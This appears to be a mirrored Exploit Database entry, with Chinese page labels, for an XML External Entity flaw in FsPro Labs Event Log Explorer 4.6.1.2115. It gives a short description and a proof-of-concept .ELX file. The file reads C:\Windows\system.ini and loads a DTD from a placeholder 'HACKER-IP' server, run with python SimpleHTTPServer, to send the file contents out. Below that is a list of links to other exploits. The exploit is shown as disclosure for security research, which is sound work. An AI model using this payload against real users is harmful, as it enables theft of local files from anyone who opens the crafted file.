FsPro Labs Event Log Explorer v4.6.1.2115 – XML External Entity Injection

Exploit Database
14 阅读

作者： hyp3rlinx

日期： 2018-09-03
类别：
- webapps
平台：
- windows
来源：https://www.exploit-db.com/exploits/45319/

# Title: FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection
# Author: hyp3rlinx
# Date: 2018-09-01
# Vendor: www.eventlogxp.com
# Software: https://eventlogxp.com/download.php
# Affected Component: elex.exe
# CVE: N/A

# Description:
# Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers 
# can potentially gain access to local files.

# PoC
python -m SimpleHTTPServer
 
"test.elx"

<?xml version="1.0"?>
<!DOCTYPE gga [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
%dtd;]>
<infodisclosa>&send;</infodisclosa>

last Exploits
FsPro Labs Event Log Explorer v4.6.1.2115 – XML External Entity Injection的更多信息

Dede CMS – SQL Injection：
FCMS CMS 2.7.2 – Multiple Cross-Site Request Forgery Vulnerabilities：
LimeSurvey 4.1.11 – ‘File Manager’ Path Traversal：
B-swiss 3 Digital Signage System 3.6.5 – Cross-Site Request Forgery (Add Maintenance Admin)：
OTRS Open Technology Real Services 3.1.4 – Persistent Cross-Site Scripting：
Seacms 11.1 – ‘ip and weburl’ Remote Command Execution：
ERPnext 11 – Cross-Site Scripting：
Mult-e-Cart Ultimate 2.4 – ‘id’ SQL Injection：